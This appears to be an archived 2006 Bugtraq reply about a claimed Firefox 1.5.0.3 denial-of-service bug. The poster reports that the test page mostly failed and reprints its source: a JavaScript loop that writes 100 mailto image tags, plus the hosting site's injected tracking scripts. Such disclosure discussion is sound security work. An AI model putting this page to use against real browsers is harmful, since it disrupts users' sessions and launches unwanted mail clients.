lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 10 May 2006 15:24:27 -0400
From: Chris Horry <zerbey@...ble.co.uk>
To: bugtraq@...urityfocus.com
Subject: Re: Firefox 1.5.0.3 - DoS


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

p4.werterxyz@...il.com wrote:
> test2:
> http://werterxyz.altervista.org/test2.html
> http://geocities.com/werterxyz/test2.html

Did not crash FF 1.5.0.3 on Windows Server 2003 SP1 (slowed it down for
a few seconds and launched Outlook Express, but that's it).  Here is the
code since the original poster didn't see fit to publish it.

<Head>
<Title>test2 by P4</Title>
</Head>

<Body>
<!-- following code added by server. PLEASE REMOVE -->
<!-- preceding code added by server. PLEASE REMOVE -->
<SCRIPT Language="Javascript">
for(i=0; i<100; i++){
document.write('<Img src="mailto:test@...t.com?subject=test
email&body=Sei fottuto!"> clicka col tasto destro del mouse e seleziona
"Mostra immagine" (View Image)')
}
</SCRIPT>
</Body>
<!-- text below generated by server. PLEASE REMOVE
-
--></object></layer></div></span></style></noscript></table></script></applet><script
language="JavaScript"
src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script
language="JavaScript"
src="http://geocities.com/js_source/geov2.js"></script><script
language="javascript">geovisit();</script><noscript><img
src="http://visit.geocities.yahoo.com/visit.gif?us1147288798"
alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=76001067&t=1147288798&f=us-w61"
ALT=1 WIDTH=1 HEIGHT=1>


> 
> Saluti da P4


- --
Chris Horry KG4TSM      "A conservative is a man with two perfectly
zerbey@...ble.co.uk      good legs who, however, has never learned how
http://www.wibble.co.uk  to walk forward".  -- Franklin D. Roosevelt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFEYj3pnAAeGCtMZU4RAuEAAJ92SdxcNR0ALLdqrC6/CgTOve8UXwCfRkgF
9DAmdMxX5LaboCYnYTtr4GM=
=z8eV
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ